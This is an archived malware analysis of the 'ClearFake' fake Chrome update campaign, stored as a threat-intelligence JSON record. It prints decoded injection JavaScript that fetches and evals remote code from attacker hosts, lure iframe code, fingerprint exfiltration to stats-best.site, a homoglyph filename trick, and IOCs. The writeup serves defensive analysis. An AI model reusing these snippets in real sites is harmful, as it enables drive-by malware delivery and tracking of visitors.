{
	"id": "909c3ce5-1595-48aa-a4fc-a09ab6089c54",
	"created_at": "2026-04-06T00:10:32.742923Z",
	"updated_at": "2026-04-10T03:35:21.563149Z",
	"deleted_at": null,
	"sha1_hash": "d040964e8a2265431d14216c4efa3f1308c64de8",
	"title": "ClearFake Malware Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 90907,
	"plain_text": "ClearFake Malware Analysis\r\nBy Randy McEoin\r\nPublished: 2023-08-06 · Archived: 2026-04-05 23:08:57 UTC\r\nThere are several malicious fake updates campaigns being run across thousands of compromised websites. Here I\r\nwill walk through one with a pattern that doesn’t match with others I’ve been tracking. This campaign appears to\r\nhave started around July 19th, 2023. Based on a search on PublicWWW of the injection base64 there are at least\r\n434 infected sites.\r\nI’m calling this one ClearFake until I see a previously used name for it. The name is a reference to the majority of\r\nthe Javascript being used without obfuscation. I say majority because base64 is used three times. That’s it. All the\r\nvariable names are in the clear, no obfuscation on them.\r\nOne noticeable difference from SocGholish is that there appears to be no tracking of visits by IP or cookies. As an\r\nanalyst you can you go back to the compromised site over and over coming from the same IP and not clearing\r\nyour browser cache. This also means the site owner is more likely to see the infection as well.\r\nWhen a user visits a compromised website with ClearFake, the page initially loads as normal before the whole\r\npage is taken over by a call to action to update Chrome. Here’s what it looks like along with Fiddler showing\r\nsome of the malicious web calls in yellow.\r\nUpdate Chrome\r\nInjection\r\nOn the index page of the compromised site there is a Javascript injection. 
The JavaScript is base64 encoded inside a data: URI in the script tag’s src. Presumably this is a dynamic injection and will change over time to reflect the new host for the initial payload.\r\n<script src=\"data:text/javascript;base64,Y29uc3QgZ2V0X3NjcmlwdD0oKT0+e2NvbnN0IHJlcXVlc3Q9bmV3IFhNTEh0dHBSZXF1ZX (the rest of the tag is cut off in the archived copy)\r\nFor EKFiddle users you might consider adding a CustomRegex to watch for these injections.\r\nCustomRegex (type: SourceCode, name: Base64 injection): <script src=\\\"data:text\\/javascript;base64,[^\\\"]+\\\"><\\/script>\r\n[Screenshot: EKFiddle Custom Regexes]\r\nI like to use CyberChef to decode such things. Here’s the injection decoded and tidied up a bit.\r\nconst get_script = () => {\r\n  const request = new XMLHttpRequest();\r\n  // Third argument false: a synchronous request, so responseText is populated before the function returns\r\n  request.open('GET', 'https://hello-world-broken-dust-1f1c.brewasigfi1978.workers.dev/', false);\r\n  request.send(null);\r\n  // The send()/return lines are cut off at the page edge in the archived copy and are completed here to match the second stage below\r\n  return request.responseText;\r\n}\r\n// Whatever the worker returns is executed in the page context\r\neval(get_script());\r\nThis is a straightforward initial call for the first payload, which is hosted on Cloudflare Workers. On workers.dev the first label of the hostname is the worker name and the second is the account subdomain, so the whole *.brewasigfi1978.workers.dev space belongs to this actor. I’ve seen two variations of the first label so far; both are listed in the IOCs.\r\nA urlscan search for the base domain shows how long it has been in use and some of the variations of the first part of the name.\r\n[Screenshot: urlscan search for brewasigfi1978.workers.dev]\r\nPayload One\r\nThe Cloudflare Worker returns a very similar JavaScript that simply makes another call to a host running Keitaro (a traffic distribution system), but not to one of Keitaro’s own endpoints.\r\nconst get_k_script = () => {\r\n  let e = new XMLHttpRequest;\r\n  // !1 is minified false: again a synchronous request whose body is returned for eval\r\n  return e.open(\"GET\", \"https://adqdqqewqewplzoqmzq.site/vvmd54/\", !1), e.send(null), e.responseText\r\n};\r\neval(get_k_script());\r\nPayload two\r\nThe second web call returns a JavaScript that creates an iframe to house the fake update UI. The iframe src is set to a Keitaro endpoint.\r\nconst url = \"https://adqdqqewqewplzoqmzq.site/ZgbN19Mx\";\r\nlet iframe = document.createElement(\"iframe\");\r\n// The framed lander can tear the lure down by posting \"removetheiframe\" to the parent window\r\nconst remove_iframe = e => {\r\n  \"removetheiframe\" == e.data && (iframe.parentNode.removeChild(iframe), document.body.removeAttribute(\"style\"));\r\n};\r\nwindow.addEventListener(\"message\", remove_iframe, !1);\r\n// Once the lander has loaded, reveal the frame and lock the underlying page\r\nconst iframe_ready = e => {\r\n    // The end of this line is cut off in the archived copy; the body style is inferred from remove_iframe, which clears it\r\n    window.scrollTo(0, 0), iframe.style.display = \"block\", iframe.style[\"margin-top\"] = \"\", document.body.style.overflow = \"hidden\";\r\n  },\r\n  create_iframe = () => {\r\n    iframe.onload = iframe_ready, iframe.src = url, iframe.style.width = \"100%\", iframe.style.height = \"100%\";\r\n    // This line is also cut off in the archived copy; the frame has to be attached to the document for onload to fire\r\n    document.body.appendChild(iframe);\r\n  };\r\ncreate_iframe();\r\nPayload three - Keitaro\r\nThe response from the Keitaro endpoint is the foundation for the HTML to be rendered within the iframe.\r\n<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head><base href=\"/lander/chrome/index.php\">\r\n  <meta charset=\"utf-8\">\r\n  <meta http-equiv=\"content-language\" content=\"en-au\">\r\n  <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\r\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\r\n  <link rel=\"icon\" type=\"image/png\" sizes=\"16x16\" href=\"img/favicon-16x16.png\">\r\n  <title>Document</title>\r\n  <link type=\"image/png\" data-href=\"p.gif\" href=\"p.gif\" class=\"pixel\">\r\n  <script>\r\n    var token = 'uuid_2qgg8u91378u2_2qgg8u91378u264ea6606b22936.89682192',\r\n      pixel = '{pixel}',\r\n      subid = '2qgg8u91378u2',\r\n      blank = 'X2luZGV4LnBocA==';\r\n    let p = document.querySelector('.pixel'),\r\n      prefix = p.href.replace(p.dataset.href, '');\r\n    self.Notification && fetch(atob(blank)).then(\r\n      function(r) {\r\n        return r.text().then(function(t) {\r\n          document.write(t.replaceAll('{static_prefix}', prefix))\r\n        })\r\n      }\r\n    );\r\n  </script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\nThe blank var base64 decoded is _index.php. Since the base href is set, when fetch() is called the path to be used will be /lander/chrome/_index.php. The .pixel link does double duty: p.href is the browser-resolved absolute URL of p.gif, so stripping the relative data-href value from it leaves the absolute directory of the lander, and that is substituted for every {static_prefix} placeholder in the fetched HTML before it is written into the document. The fetch is also gated on self.Notification, so a client without the Notification API is left with an empty page.\r\n_index.php\r\n_index.php finally contains all the HTML/CSS to build the fake update webpage.\r\n[Screenshot: the fake update page built by _index.php]\r\nIt also contains two malicious components.\r\nFingerprint\r\nFingerprintJS is included within _index.php. Near the bottom it is used to fingerprint the browser and send the results to the threat actor at stats-best.site. This will happen as the page renders.\r\n<script onload=\"initFingerprintJS()\">\r\n  function initFingerprintJS() {\r\n    FingerprintJS.load().then(fp => {\r\n      fp.get().then(result => {\r\n        const visitorId = result.visitorId;\r\n        FPID = visitorId; // kept as a global for the download handler below\r\n        // The visitor ID, the complete fingerprint components (base64 of the JSON) and the hostname are POSTed via jQuery\r\n        var Data = {FPID : visitorId, FPData : btoa(JSON.stringify(result)), Domain : window.location.hostname};\r\n        var Link_Connect = 'https://stats-best.site/fp.php';\r\n        var saveData = $.ajax({\r\n          type: 'POST',\r\n          url: Link_Connect,\r\n          data: Data,\r\n          dataType: \"text\",\r\n          //success: function(resultData) { console.log(resultData) }\r\n        });\r\n        //Cookies.set('FPID', visitorId);\r\n      });\r\n    });\r\n  }\r\n  // Records whether a pointer ever hovered the download button; the flag is sent with the download request\r\n  $('.DownloadMouse').hover( function(){DownloadMouse=true;});\r\n  initFingerprintJS();\r\n</script>\r\nDownload hero\r\nThe last malicious chunk of JavaScript within _index.php is used to make the Update Chrome button clickable.\r\n<script>\r\n  document.getElementById('js-download-hero').onclick = (e) => {\r\n    e.preventDefault();\r\n    var params = new URLSearchParams(document.location.search.substr(1));\r\n    // getSubId, getToken, getPixel and setCookie are defined elsewhere in _index.php and are not in this excerpt\r\n    var _subid = subid || getSubId();\r\n    var _token = token || getToken();\r\n    var _pixel = pixel || getPixel();\r\n    params.set(\"_token\", _token);\r\n    setCookie(\"pixel\", _pixel);\r\n    setCookie(\"token\", _token);\r\n    setCookie(\"subid\", _subid);\r\n    setCookie(\"FPID\", FPID);\r\n    setCookie(\"DownloadMouse\", DownloadMouse);\r\n    var data = JSON.stringify({\r\n      FPID: FPID,\r\n      DownloadMouse: DownloadMouse,\r\n      Domain: window.location.hostname,\r\n      RGET: 'W10=', // base64 of \"[]\"\r\n      FileID: '12CR3zJzTg'\r\n    });\r\n    try {\r\n      // atob('P19scD0x') is '?_lp=1', so the download request goes to the root of the current (Keitaro) host\r\n      var url = new URL(location.protocol + '//' + location.host + atob('P19scD0x'));\r\n      url.searchParams.append('FPID', FPID);\r\n      url.searchParams.append('DownloadMouse', DownloadMouse);\r\n      url.searchParams.append('D', btoa(data));\r\n      // url.searchParams.append('timestamp', ts);\r\n      // Carry over any query parameters the lander was loaded with, without overriding the ones set above\r\n      params.forEach(function(v, k) {\r\n        if ([...url.searchParams.keys()].includes(k)) {return;}\r\n        url.searchParams.append(k, v);\r\n      });\r\n      window.location.href = url.toString();\r\n    } catch (e) {\r\n      console.error(\r\n        `[Exception] Bad params: unexpected link '${url.href}' for new Url()`\r\n      );\r\n    }\r\n  }\r\n</script>\r\nUpon clicking the button, the URL is built with various parameters. Again there is a touch of base64 for the path. Here it is P19scD0x which decodes to ?_lp=1. Because this script runs inside the iframe, location.host (and the Domain field) is the Keitaro host rather than the compromised site, and the D parameter is simply the base64 of the JSON object built above.\r\nAn example fully built URL would look like this.\r\nhttps://adqdqqewqewplzoqmzq.site/?_lp=1&FPID=bf323fcc78558f702aa91668e1f2996b&DownloadMouse=true&D=eyJGUElEIjoiYmYzMTNmY2M3ODUxOGY3MDJhYTk5NjY4ZTFmMjk5NmIiLCJEb3dubG9hZE1vdXNlIjp0cnVlLCJEb21haW4iOiJhZHFkcXFld3Fld3Bsem9xbXpxLnNpdGUiLCJSR0VUIjoiVzEwPSIsIkZpbGVJRCI6IjEyQ1Izekp6VGcifQ%3D%3D&_token=uuid_2qgq8u92368u2_2qgu8u91g78u264ea6606b22936.85686112\r\nOf note is the FPID parameter. It is the FingerprintJS visitorId which was sent earlier to stats-best.site. This appears to be a unique identifier that presumably should make it difficult for analysts to arbitrarily replay or poke at the final endpoint.\r\nThis download endpoint answers with a 302 redirect to wherever the malicious executable is currently hosted, which the user sees as a download.\r\n[Screenshot: the 302 redirect to the download]\r\nWhen this campaign was first observed yesterday the redirect was to login.live.com and required a login to Outlook. Sadly the payload was not there. Today it is for a OneDrive file with a URL that looked like this.\r\nhttps://1ltveg.bn.files.1drv.com/y4mAk..2Njigg/Chr%D0%BEm%D0%B5S%D0%B5tu%D1%80.exe?download&psid=1\r\nOf note here is the obscured filename, which URL-encoded is this.\r\nChr%D0%BEm%D0%B5S%D0%B5tu%D1%80.exe\r\nVisually the end user will see ChrоmеSеtuр.exe, but the o, both e’s and the p are not ASCII: %D0%BE, %D0%B5 and %D1%80 are the UTF-8 encodings of Cyrillic о (U+043E), е (U+0435) and р (U+0440), homoglyphs of the Latin letters. That hampers detections based simply on the string ChromeSetup.exe.\r\nOnce downloaded, if the user runs the EXE they’ll become infected with Amadey, as this report shows.\r\nTriage report\r\nTiming\r\nI like to use TLS certificates as one method to determine when malicious domains come online. With the domains I’ve seen so far, the earliest date is July 19th.\r\nKeitaro\r\n* Server certificate:\r\n* subject: CN=borbrbmrtxtrbxrq.site\r\n* start date: Aug 22 12:46:47 2023 GMT\r\n* expire date: Nov 20 12:46:46 2023 GMT\r\n* common name: borbrbmrtxtrbxrq.site\r\n* issuer: CN=GTS CA 1P5,O=Google Trust Services LLC,C=US\r\n* Server certificate:\r\n* subject: CN=adqdqqewqewplzoqmzq.site\r\n* start date: Aug 22 12:19:03 2023 GMT\r\n* expire date: Nov 20 12:19:02 2023 GMT\r\n* common name: adqdqqewqewplzoqmzq.site\r\n* issuer: CN=GTS CA 1P5,O=Google Trust Services LLC,C=US\r\n* Server certificate:\r\n* subject: CN=wnimodmoiejn.site\r\n* start date: Aug 17 08:02:41 2023 GMT\r\n* expire date: Nov 15 08:02:40 2023 GMT\r\n* common name: wnimodmoiejn.site\r\n* issuer: CN=E1,O=Let's Encrypt,C=US\r\n* Server certificate:\r\n* subject: CN=wffewiuofegwumzowefmgwezfzew.site\r\n* start date: Aug 18 08:53:35 2023 GMT\r\n* expire date: Nov 16 08:53:34 2023 GMT\r\n* common name: wffewiuofegwumzowefmgwezfzew.site\r\n* issuer: CN=GTS CA 1P5,O=Google Trust Services LLC,C=US\r\n* Server certificate:\r\n* subject: CN=komomjinndqndqwf.store\r\n* start date: Aug 18 08:15:52 2023 GMT\r\n* expire date: Nov 16 08:15:51 2023 GMT\r\n* common name: komomjinndqndqwf.store\r\n* issuer: CN=E1,O=Let's Encrypt,C=US\r\n* Server certificate:\r\n* subject: CN=omdowqind.site\r\n* start date: Jul 28 07:21:20 2023 GMT\r\n* expire date: Oct 26 07:21:19 2023 GMT\r\n* common name: omdowqind.site\r\n* issuer: CN=GTS CA 1P5,O=Google Trust Services LLC,C=US\r\nSupport sites\r\n* Server certificate:\r\n* subject: CN=brewasigfi1978.workers.dev\r\n* start date: Jul 19 14:07:05 2023 GMT\r\n* expire date: Oct 17 14:07:04 2023 GMT\r\n* common name: brewasigfi1978.workers.dev\r\n* issuer: CN=GTS CA 1P5,O=Google Trust Services LLC,C=US\r\n* Server certificate:\r\n* subject: CN=stats-best.site\r\n* start date: Jul 23 15:30:01 2023 GMT\r\n* expire date: Oct 21 15:30:00 2023 GMT\r\n* common name: stats-best.site\r\n* issuer: CN=GTS CA 1P5,O=Google Trust Services LLC,C=US\r\nIOCs\r\nCloudflare Workers\r\nhello-world-broken-dust-1f1c.brewasigfi1978.workers.dev\r\nhello-world-hidden-hat-62a9.brewasigfi1978.workers.dev\r\n*.brewasigfi1978.workers.dev\r\nKeitaro and Assets\r\nadqdqqewqewplzoqmzq.site\r\nborbrbmrtxtrbxrq.site\r\nkomomjinndqndqwf.store\r\nomdowqind.site\r\nwffewiuofegwumzowefmgwezfzew.site\r\nwnimodmoiejn.site\r\nFingerprinting\r\nstats-best.site\r\nHash (SHA-256)\r\n10f504133a652d196aa14eb26d55d0b53da16590584696a1f282a95bb3e9c08a\r\nC2\r\n45.9.74.182/b7djSDcPcZ/index.php\r\nSource: https://rmceoin.github.io/malware-analysis/clearfake/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://rmceoin.github.io/malware-analysis/clearfake/"
	],
	"report_names": [
		"clearfake"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434232,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d040964e8a2265431d14216c4efa3f1308c64de8.pdf",
		"text": "https://archive.orkl.eu/d040964e8a2265431d14216c4efa3f1308c64de8.txt",
		"img": "https://archive.orkl.eu/d040964e8a2265431d14216c4efa3f1308c64de8.jpg"
	}
}